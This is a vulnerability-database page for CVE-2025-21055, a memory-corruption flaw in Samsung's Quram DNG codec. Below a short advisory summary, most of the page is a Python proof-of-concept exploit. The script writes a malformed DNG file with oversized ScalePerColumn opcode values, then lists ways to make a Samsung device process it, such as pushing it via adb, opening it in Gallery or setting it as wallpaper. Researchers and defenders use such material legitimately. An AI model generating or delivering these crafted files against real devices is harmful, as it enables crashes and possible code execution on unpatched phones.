Vulners
Lucene search
📄 Android 13 Quram DNG Codec Memory Corruption
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2025-21055 | 10 Oct 202507:09 | – | circl |
 | SAMSUNG Mobile devices 安全漏洞 | 10 Oct 202500:00 | – | cnnvd |
 | Unspecified vulnerability in SAMSUNG Mobile devices (CNVD-2025-24783) | 21 Oct 202500:00 | – | cnvd |
 | CVE-2025-21055 | 10 Oct 202506:33 | – | cve |
 | CVE-2025-21055 | 10 Oct 202506:33 | – | cvelist |
 | EUVD-2025-33677 | 10 Oct 202509:30 | – | euvd |
 | CVE-2025-21055 | 10 Oct 202507:15 | – | nvd |
 | CVE-2025-21055 | 10 Oct 202507:15 | – | osv |
 | 📄 Samsung Quram DNG Advanced Remote Code Execution | 9 Feb 202600:00 | – | packetstorm |
 | PT-2025-41516 | 10 Oct 202500:00 | – | ptsecurity |
10
=============================================================================================================================================
| # Title : Android 13 Quram DNG Codec Memory Corruption Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.samsung.com/n_africa/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211371/ & CVE-2025-21055 https://packetstorm.news/download/211371
[+] Summary :
CVE‑2025‑21055 is an Out‑of‑Bounds Read/Write vulnerability in **Samsung’s Quram image codec library** (`libimagecodec.quram.so`).
The flaw is triggered when the library processes a maliciously crafted image file, causing memory access outside the intended buffer boundaries.
Successful exploitation can result in **information disclosure**, **application crash**, or potentially **arbitrary code execution**,
depending on the attack scenario. The issue affects Samsung devices running vulnerable versions of the Quram codec **prior to the security update SMR October 2025 Release 1**.
Samsung addressed the vulnerability by releasing a patched version of the image codec library in the October 2025 Security Maintenance Release (SMR).
[+] Vulnerability: Remote Code Execution in Samsung’s libimagecodec.quram.so library.
[+] Affected software: Samsung devices running Android 13 with firmware older than SMR Oct‑2025 Release 1.
[+] Impact: An attacker can exploit the vulnerability via specially crafted image files to execute arbitrary code on the device.
[+] Affected devices: All Samsung devices using the vulnerable library version, including (but not limited to) Galaxy S22, S23, S24, Z Fold4, Z Flip4—only if firmware is unpatched.
[+] Patch/Remediation: Apply the October 2025 SMR or later security update.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
Proof of Concept for CVE-2025-21055
Quram DNG Codec Memory Corruption Vulnerability
"""
import struct
import os
def create_malicious_dng():
"""
إنشاء ملف DNG مصمم لإثارة الخلل في QuramDngOpcodeScalePerColumn
"""
# هيكل أساسي لملف DNG مع opcodes مخصصة
dng_data = bytearray()
# TIFF Header (مطلوب لملفات DNG)
dng_data.extend(b'II*\x00') # Little-endian TIFF
dng_data.extend(struct.pack('<I', 8)) # Offset to IFD0
# IFD0 - Basic tags
ifd0_data = bytearray()
ifd0_data.extend(struct.pack('<H', 11)) # Number of entries
# ImageWidth (مطلوب) - Tag 256, Type=LONG (4), Count=1, Value=100
ifd0_data.extend(struct.pack('<HHI', 256, 4, 1))
ifd0_data.extend(struct.pack('<I', 100))
# ImageLength (مطلوب) - Tag 257, Type=LONG (4), Count=1, Value=100
ifd0_data.extend(struct.pack('<HHI', 257, 4, 1))
ifd0_data.extend(struct.pack('<I', 100))
# BitsPerSample - Tag 258, Type=SHORT (3), Count=3
ifd0_data.extend(struct.pack('<HHI', 258, 3, 3))
bits_per_sample_offset = len(dng_data) + len(ifd0_data) + 4
ifd0_data.extend(struct.pack('<I', bits_per_sample_offset))
# Compression - Tag 259, Type=SHORT (3), Count=1, Value=1 (No compression)
ifd0_data.extend(struct.pack('<HHI', 259, 3, 1))
ifd0_data.extend(struct.pack('<H', 1)) # Value in the offset field
ifd0_data.extend(b'\x00\x00') # Padding
# PhotometricInterpretation - Tag 262, Type=SHORT (3), Count=1, Value=32803 (CFA)
ifd0_data.extend(struct.pack('<HHI', 262, 3, 1))
ifd0_data.extend(struct.pack('<H', 32803))
ifd0_data.extend(b'\x00\x00') # Padding
# Make DNG-specific tags
# DNGVersion - Tag 50706, Type=BYTE (1), Count=4, Value=[1,0,0,0]
ifd0_data.extend(struct.pack('<HHI', 50706, 1, 4))
dng_version_offset = len(dng_data) + len(ifd0_data) + 4
ifd0_data.extend(struct.pack('<I', dng_version_offset))
# DNGBackwardVersion - Tag 50707, Type=BYTE (1), Count=4, Value=[1,0,0,0]
ifd0_data.extend(struct.pack('<HHI', 50707, 1, 4))
dng_backward_offset = len(dng_data) + len(ifd0_data) + 4
ifd0_data.extend(struct.pack('<I', dng_backward_offset))
# OpcodeList1 - النقطة الحرجة للهجوم - Tag 51008
opcode_list = create_malicious_opcodes()
ifd0_data.extend(struct.pack('<HHI', 51008, 1, len(opcode_list)))
opcode_list_offset = len(dng_data) + len(ifd0_data) + 4
ifd0_data.extend(struct.pack('<I', opcode_list_offset))
# CFAPattern - Tag 33421, Type=BYTE (1), Count=4
ifd0_data.extend(struct.pack('<HHI', 33421, 1, 4))
cfa_pattern_offset = len(dng_data) + len(ifd0_data) + 4
ifd0_data.extend(struct.pack('<I', cfa_pattern_offset))
# نموذج CFA بسيط - RGGB
cfa_pattern = b'\x00\x01\x01\x02'
# إضافة بيانات إضافية
ifd0_data.extend(struct.pack('<I', 0)) # Offset to next IFD
# دمج كل البيانات
dng_data.extend(ifd0_data)
# إضافة البيانات المرجعية
# BitsPerSample data
dng_data.extend(struct.pack('<HHH', 16, 16, 16))
# DNGVersion data
dng_data.extend(b'\x01\x00\x00\x00')
# DNGBackwardVersion data
dng_data.extend(b'\x01\x00\x00\x00')
# CFA Pattern data
dng_data.extend(cfa_pattern)
# إضافة OpcodeList في الموضع الصحيح
opcode_pos = opcode_list_offset - len(dng_data)
if opcode_pos < 0:
# إذا كان الموقع سالباً، نضيف padding
padding_needed = -opcode_pos
dng_data.extend(b'\x00' * padding_needed)
dng_data.extend(opcode_list)
else:
# إذا كان الموقع موجباً، نضيف في الموضع المحدد
if len(dng_data) < opcode_list_offset:
dng_data.extend(b'\x00' * (opcode_list_offset - len(dng_data)))
dng_data.extend(opcode_list)
return bytes(dng_data)
def create_malicious_opcodes():
"""
إنشاء opcodes مصممة لإثارة الخلل في ScalePerColumn
"""
opcodes = bytearray()
# Opcode ID لـ ScalePerColumn (قيمة افتراضية - تحتاج التحقق)
scale_per_column_id = 0x0000000A
# Version
opcodes.extend(struct.pack('<I', 1))
# إحداثيات المنطقة - قيم مصممة لإثارة integer overflow
# استخدام قيم كبيرة لإثارة الفائض في الحسابات
top = 0x00000000
left = 0x00000000
bottom = 0xFFFFFFFF # قيمة كبيرة جداً
right = 0xFFFFFFFF # قيمة كبيرة جداً
opcodes.extend(struct.pack('<IIII', top, left, bottom, right))
# عدد الأعمدة - قيمة غير طبيعية
column_count = 0x7FFFFFFF # MAX_INT تقريباً
opcodes.extend(struct.pack('<I', column_count))
# معاملات القياس - قيم مصممة لإثارة الخلل في الحسابات
# استخدام قيم تؤدي إلى عناوين ذاكرة غير صالحة
for i in range(100): # عدد كبير من المعاملات
# قيم مصممة لإنشاء عنوان ذاكرة غير قانوني
if i % 4 == 0:
factor = 0xB4000000 + (i * 0x1000) # محاولة الوصول لعنوان الكراش
else:
factor = 0x00000001 # قيم عادية لتجنب الاكتشاف المبكر
opcodes.extend(struct.pack('<I', factor & 0xFFFFFFFF))
return opcodes
def create_simplified_indoushka():
"""
نسخة مبسطة من الملف الخبيث تركز على الجزء الأساسي
"""
dng_data = bytearray()
# TIFF Header بسيط
dng_data.extend(b'II*\x00\x08\x00\x00\x00') # Header + offset to IFD
# IFD مع عدد قليل من Tags
ifd_data = bytearray()
ifd_data.extend(struct.pack('<H', 5)) # 5 entries
# ImageWidth
ifd_data.extend(struct.pack('<HHI', 256, 4, 1))
ifd_data.extend(struct.pack('<I', 100))
# ImageLength
ifd_data.extend(struct.pack('<HHI', 257, 4, 1))
ifd_data.extend(struct.pack('<I', 100))
# Compression
ifd_data.extend(struct.pack('<HHI', 259, 3, 1))
ifd_data.extend(struct.pack('<H', 1))
ifd_data.extend(b'\x00\x00')
# PhotometricInterpretation (CFA)
ifd_data.extend(struct.pack('<HHI', 262, 3, 1))
ifd_data.extend(struct.pack('<H', 32803))
ifd_data.extend(b'\x00\x00')
# OpcodeList1 - التركيز على الجزء المهم
ifd_data.extend(struct.pack('<HHI', 51008, 1, 1000)) # حجم كبير
opcode_offset = len(dng_data) + len(ifd_data) + 4
ifd_data.extend(struct.pack('<I', opcode_offset))
# No next IFD
ifd_data.extend(struct.pack('<I', 0))
dng_data.extend(ifd_data)
# إضافة opcodes خبيثة
opcodes = bytearray()
opcodes.extend(struct.pack('<I', 1)) # version
# إحداثيات كبيرة جداً
opcodes.extend(struct.pack('<IIII', 0, 0, 0x7FFFFFFF, 0x7FFFFFFF))
# معاملات قياس مصممة للتسبب في memory corruption
for i in range(200):
if i == 50: # في منتصف البيانات، نضيف القيم الخبيثة
opcodes.extend(struct.pack('<I', 0xB4000079))
opcodes.extend(struct.pack('<I', 0x2607A000))
else:
opcodes.extend(struct.pack('<I', i))
# تأكد من أن البيانات في الموضع الصحيح
if len(dng_data) < opcode_offset:
dng_data.extend(b'\x00' * (opcode_offset - len(dng_data)))
dng_data.extend(opcodes)
return bytes(dng_data)
def indoushka_via_gallery(file_path):
"""
محاولة استغلال الثغرة عبر معالجة الملف في الجاليري
"""
print(f"[+] Creating malicious DNG file: {file_path}")
try:
# محاولة إنشاء الملف بالطريقة المعقدة أولاً
malicious_dng = create_malicious_dng()
print("[+] Complex DNG created successfully")
except Exception as e:
print(f"[-] Complex method failed: {e}")
print("[+] Trying simplified method...")
malicious_dng = create_simplified_indoushka()
print("[+] Simplified DNG created successfully")
with open(file_path, 'wb') as f:
f.write(malicious_dng)
file_size = os.path.getsize(file_path)
print(f"[+] Malicious DNG file created: {file_path} ({file_size} bytes)")
print("\n[+] Trigger methods:")
print(" 1. Copy file to device: adb push indoushka.dng /sdcard/Download/")
print(" 2. Open file in Samsung Gallery")
print(" 3. Use 'Set as wallpaper' feature")
print(" 4. Share the image to Gallery")
print(" 5. Wait for automatic thumbnail generation")
def analyze_crash():
"""
تحليل معلومات الكراش من السجل المرفق
"""
print("\n[!] Crash Analysis:")
print(" - Fault address: 0xb40000792607a000 (non-canonical ARM64 address)")
print(" - Crash in: QuramDngOpcodeScalePerColumn::processArea()")
print(" - Likely cause: Integer overflow in memory calculation")
print(" - Attack vector: Malicious ScalePerColumn opcode in DNG")
if __name__ == "__main__":
print("CVE-2025-21055 - Quram DNG Codec PoC")
print("=====================================")
output_file = "indoushka.dng"
analyze_crash()
indoushka_via_gallery(output_file)
print(f"\n[!] PoC file '{output_file}' generated successfully")
print("[!] Test on isolated device only!")
print("[!] Actual exploitation requires precise opcode values from reverse engineering")
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Dec 2025 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.14.3 - 7.5
EPSS0.00044